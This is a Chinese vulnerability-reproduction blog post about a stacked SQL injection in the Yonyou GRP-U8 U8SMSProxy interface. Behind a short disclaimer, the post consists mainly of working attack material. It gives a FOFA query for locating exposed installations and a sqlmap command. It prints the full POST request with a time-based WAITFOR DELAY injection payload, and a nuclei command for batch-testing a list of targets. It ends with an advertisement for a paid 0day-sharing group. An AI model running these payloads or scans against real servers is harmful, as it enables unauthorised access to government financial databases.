漏洞复现 用友 GRP-U8 U8SMSProxy SQL堆叠注入漏洞
2023-5-19 14:15:27 Author: 阿乐你好(查看原文) 阅读量:83 收藏

0x01 阅读须知

融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

0x02 漏洞描述

用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 U8SMSProxy接口存在SQL堆叠注入漏洞,攻击者通过漏洞可以获取数据库权限。

0x03 漏洞复现

fofatitle="用友GRP-U8行政事业内控管理软件"

1.使用POC进行sqlmap注入,得到数据库版本,显示为堆叠注入,但是只能通过时间判断

sqlmap命令和代理监听:python sqlmap.py -r 1.txt --proxy=http://127.0.0.1:8080
POC:POST /U8SMSProxy?class=XXNote&id=qryyfs HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=FD111DFB1059473AF214DB0E529918E5DNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 78
begindate=2020-09-27&enddate=2020-10-27&search=
payload:begindate=2020-09-27';WAITFOR DELAY '0:0:5'--&enddate=2020-10-27&search=

2.nuclei批量验证脚本已发表于知识星球

nuclei.exe -t yongyouu8-U8SMSProxy-sql-stacked-queries.yaml -l subs.txt -stats

网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精,敬请期待!
👇👇👇


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247489356&idx=1&sn=5aebea7208e851853bd730d4c756f7c4&chksm=979a3804a0edb112997e85f0ba1b4de4642b5b7921597a007ec3adccddbf14c57896befd1faf#rd
如有侵权请联系:admin#unsafe.sh